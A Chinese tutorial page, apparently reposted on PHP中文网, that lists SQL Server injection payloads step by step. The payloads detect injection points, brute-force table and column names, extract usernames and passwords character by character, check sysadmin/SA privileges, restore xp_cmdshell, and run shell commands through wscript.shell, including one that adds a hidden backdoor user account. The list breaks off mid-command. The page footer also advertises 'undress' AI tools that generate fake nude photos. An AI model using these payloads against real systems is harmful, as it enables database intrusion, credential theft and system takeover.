常用SQL注射语句解析_MySQL-mysql教程-PHP中文网

首页

数据库

mysql教程

常用SQL注射语句解析_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:51 PM

bitsCN.com

　SQL注射语句
　　1.判断有无注入点

　　' ; and 1=1 and 1=2

　　2.猜表一般的表的名称无非是admin adminuser user pass password 等..

　　and 0(select count(*) from *)

　　and 0(select count(*) from admin) ---判断是否存在admin这张表

　　3.猜帐号数目如果遇到0

　　and 0

　　and 1

　　4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称。

　　and 1=(select count(*) from admin where len(*)>0)--

　　and 1=(select count(*) from admin where len(用户字段名称name)>0)

　　and 1=(select count(*) from admin where len(密码字段名称password)>0)

　　5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止

　　and 1=(select count(*) from admin where len(*)>0)

　　and 1=(select count(*) from admin where len(name)>6) 错误

　　and 1=(select count(*) from admin where len(name)>5) 正确长度是6

　　and 1=(select count(*) from admin where len(name)=6) 正确

　　and 1=(select count(*) from admin where len(password)>11) 正确

　　and 1=(select count(*) from admin where len(password)>12) 错误长度是12

　　and 1=(select count(*) from admin where len(password)=12) 正确

　　6.猜解字符

　　and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位

　　and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位

　　就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

　　and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

　　这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

　　看服务器打的补丁=出错了打了SP4补丁

　　and 1=(select @@VERSION)--

　　看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。

　　and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

　　判断连接数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）

　　and 'sa'=(Select System_user)--

　　and user_name()='dbo'--

　　and 0(select user_name()--

　　看xp_cmdshell是否删除

　　and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND

　　name = 'xp_cmdshell')--

　　xp_cmdshell被删除，恢复,支持绝对路径的恢复

　　;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

　　;EXEC master.dbo.sp_addextendedproc

　　'xp_cmdshell','c:/inetpub/wwwroot/xplog70.dll'--

　　反向PING自己实验

　　;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec

　　sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

　　加帐号

　　;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add'--

　　创建一个虚拟目录E盘：

　　;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

　　@o, 'run', NULL,' cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -

bitsCN.com

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

如何使用Alter Table语句在MySQL中更改表？Mar 19, 2025 pm 03:51 PM

本文讨论了使用MySQL的Alter Table语句修改表，包括添加/删除列，重命名表/列以及更改列数据类型。

如何为MySQL连接配置SSL/TLS加密？Mar 18, 2025 pm 12:01 PM

文章讨论了为MySQL配置SSL/TLS加密，包括证书生成和验证。主要问题是使用自签名证书的安全含义。[角色计数：159]

您如何处理MySQL中的大型数据集？Mar 21, 2025 pm 12:15 PM

文章讨论了处理MySQL中大型数据集的策略，包括分区，碎片，索引和查询优化。

哪些流行的MySQL GUI工具（例如MySQL Workbench，PhpMyAdmin）是什么？Mar 21, 2025 pm 06:28 PM

文章讨论了流行的MySQL GUI工具，例如MySQL Workbench和PhpMyAdmin，比较了它们对初学者和高级用户的功能和适合性。[159个字符]

如何使用Drop Table语句将表放入MySQL中？Mar 19, 2025 pm 03:52 PM

本文讨论了使用Drop Table语句在MySQL中放下表，并强调了预防措施和风险。它强调，没有备份，该动作是不可逆转的，详细介绍了恢复方法和潜在的生产环境危害。

您如何用外国钥匙代表关系？Mar 19, 2025 pm 03:48 PM

文章讨论了使用外国密钥来代表数据库中的关系，重点是最佳实践，数据完整性和避免的常见陷阱。

如何保护MySQL免受常见漏洞（SQL注入，蛮力攻击）？Mar 18, 2025 pm 12:00 PM

文章讨论了使用准备好的语句，输入验证和强密码策略确保针对SQL注入和蛮力攻击的MySQL。（159个字符）

如何在JSON列上创建索引？Mar 21, 2025 pm 12:13 PM

本文讨论了在PostgreSQL，MySQL和MongoDB等各个数据库中的JSON列上创建索引，以增强查询性能。它解释了索引特定的JSON路径的语法和好处，并列出了支持的数据库系统。

See all articles

热AI工具

Undresser.AI Undress

人工智能驱动的应用程序，用于创建逼真的裸体照片

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

免费脱衣服图片

Clothoff.io

AI脱衣机

AI Hentai Generator

免费生成ai无尽的。

显示更多

热工具

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

螳螂BT

Mantis是一个易于部署的基于Web的缺陷跟踪工具，用于帮助产品缺陷跟踪。它需要PHP、MySQL和一个Web服务器。请查看我们的演示和托管服务。

MinGW - 适用于 Windows 的极简 GNU

这个项目正在迁移到osdn.net/projects/mingw的过程中，你可以继续在那里关注我们。MinGW：GNU编译器集合（GCC）的本地Windows移植版本，可自由分发的导入库和用于构建本地Windows应用程序的头文件；包括对MSVC运行时的扩展，以支持C99功能。MinGW的所有软件都可以在64位Windows平台上运行。